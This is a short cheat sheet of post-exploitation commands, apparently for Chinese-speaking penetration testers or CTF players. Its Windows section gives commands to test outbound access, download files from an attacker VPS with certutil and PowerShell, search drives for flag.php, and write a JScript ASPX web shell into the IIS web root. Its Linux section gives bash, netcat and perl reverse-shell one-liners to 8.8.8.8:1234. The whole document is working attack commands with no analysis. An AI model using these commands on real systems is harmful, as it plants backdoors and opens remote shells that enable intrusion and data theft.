win

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
#探测目标是否出网
powershell Invoke-WebRequest -Uri http://vps/

#文件下载
certutil.exe -urlcache -split -f http://vps/a.txt D:\a.txt
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://vps/a.txt', 'D:\a.txt')"

#命令执行查找web目录
dir /s/a-d/b D:\*flag.php
where /r D:\ flag.php
for /r D:\ %i in (*flag.php) do @echo %i
for /r D:\ %i in (*flag.php) do @echo %i>%i.txt

#写shell
echo ^<%@ Page Language="Jscript"%^> ^<% eval(Request.Item["ant"],"unsafe"); %^>> C:\inetpub\wwwroot\a.aspx

Linux

1
2
3
4
#反弹shell
bash -i >& /dev/tcp/8.8.8.8/1234 0>&1
nc -e /bin/bash 8.8.8.8 1234
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"8.8.8.8:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'